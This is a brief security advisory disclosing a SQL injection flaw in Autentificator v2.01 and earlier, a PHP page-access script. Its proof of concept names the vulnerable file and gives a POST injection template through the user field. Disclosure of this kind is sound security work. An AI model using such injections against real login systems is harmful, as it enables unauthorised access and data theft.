Autentificator <=2.01 SQL Injection Vulnerability
Discovered by Sirdarckcat from elhacker.net
------------------------------------------------------------------------------------
Autentificator v2.01 SQL Injection
http://www.hotscripts.com/Detailed/15291.html
------------------------------------------------------------------------------------
Autentificator is a simple PHP based program for
helping administrators to controll access to certain
pages.
It suffers of a SQL Injection vulnerability.
------------------------------------------------------------------------------------
PoC:
http://autentificator/aut_verifica.inc.php
POST DATA:
user='+[SQL]&pass=something
------------------------------------------------------------------------------------
Att.
Sirdarckcat
elhacker.net